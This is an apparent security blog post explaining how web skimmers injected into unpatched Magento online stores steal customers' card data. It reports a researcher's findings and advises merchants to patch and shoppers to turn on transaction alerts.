You’ve probably heard about credit card skimmers that hackers attach to everything from gas pumps to ATMs to self checkout terminals at grocery stores, all in an effort to steal your credit card info.
As more stores go to chip based credit cards where stealing the information off the stripe won’t let hackers use that card in the physical world, the hackers have adapted their actions to the virtual world. And, not surprisingly, virtual merchants are denying reality like physical merchants did until the wakeup calls were received from the likes of Target, Home Depot and Wendy’s.
So what are they doing? I’m glad you asked!
They are installing virtual skimmers on hackable web sites. With a virtual skimmer, the hacker inserts him or her self in between the user and the credit card processor on the web page where it captures your credit card.
This technique will only work if the web site can be compromised so that the hacker can modify the correct web page.
This particular attack works on the magento ecommerce platform that many sites are built on top of. Especially for those sites that do not install patches ever or do not install patches promptly, if the hackers can find the site before the patches are installed, they may be able to add their virtual skimmer to the site. It is highly unlikely that those sites would detect that the site had been modified because, like with a physical world skimmer, after the data is captured and sent to China, Russia or Ukraine, it is forwarded on to the credit card processor. The site gets its money and the hacker gets the credit card data.
So far, a Dutch researcher has found the virtual skimmer software on 6,000 online stores. He says that number is growing at a rate of 85 new stores every day. The good news (for the hacker) is that these are mostly small stores and are 99% unlikely to figure out that they have been hacked unless the FBI comes to visit them. That is unlikely to happen because the FBI is busy with the likes of Vera Bradley.
What this means is that these sites will continue to let the hackers steal credit card data until the banks figure out that they are the source and cancel their credit card merchant account and sue them. Then the site goes out of business because most of them are small enough not to have cyber insurance. Of course, going out of business may or may not cause the lawsuit to go away, so for at least some of those web sites, the bank will probably get a default judgement against them and that will cause them to, possibly, have to file for bankruptcy protection or pay off the bank. Not a pretty picture, to be honest.
So who are these sites that have a virtual skimmer installed?
One is the Republican Senatorial Committee’s online store.
When The Register asked the Republican Senatorial Committee if they had secured their web site or if customers coming to their web site were safe from hackers, they got the silent treatment. My suggestion would be for people to not provide their credit card to any Republican web site until we have a positive statement from them that they have fixed the problem and that using your credit card there is safe again. Obviously, it is embarrassing, especially during an election cycle, to tell donors that you have been hacked. The researcher said that he told the Republicans about the problem and they also did not respond to him, but that they removed that script.
The researcher said that as far as he can tell this particular hack has been going on since May of last year, but unlike stopping the attack at Vera Bradley, stopping this attack would require getting at least tens of thousands of web sites to patch their software and likely hire someone to remove the malware. These site owners are small businesses, for the most part, and don’t have the skill to do it themselves.
Some of the sites that the researcher contacted said “thanks, but we are safe, no worries” or “we are safe because we use https” or “we are safe because we have the Symantec security seal”. That is the denial part I was talking about earlier.
The researcher has discovered 9 variations of the scripts. Does that mean 9 hacking organizations are using this technique or just that the developer has a commitment to continuous improvement and is iterating the technology?
What is likely to occur, now that the media is reporting this, is for other hackers to figure out how to replicate this and find other unpatched web sites that can be infected, whether they are running Magento or something else.
eCommerce web sites should pay attention to this as they may be held liable by the credit card companies and have to foot the bill for the fraud. And, of course, they need to install patches very quickly so that hackers don’t have a window to attack them prior to installing the patches.
For customers, watch your statements, but even more important, turn on the text alerts that almost all banks offer to get a text when your card has been used. If people would do that, it would kill the credit card theft business overnight because cards would be good for one fraudulent transaction, at most, which is a pretty slim payday.
Information for this post came from The Register.